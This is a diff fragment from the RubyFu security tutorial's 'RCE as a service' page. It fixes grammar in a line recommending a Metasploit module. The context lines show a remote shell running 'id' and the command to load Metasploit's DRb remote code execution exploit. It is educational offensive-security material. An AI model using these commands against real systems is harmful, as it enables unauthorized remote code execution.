rubyfu/RubyFu/module_0x2__system_kungfu/rce_as_a_service.md

 puts rshell.exec "id"
 ```

-Or you can use metasploit module to get an elegant shell!
+Or you can use a Metasploit module to get an elegant shell!

 ```bash
 msf > use exploit/linux/misc/drb_remote_codeexec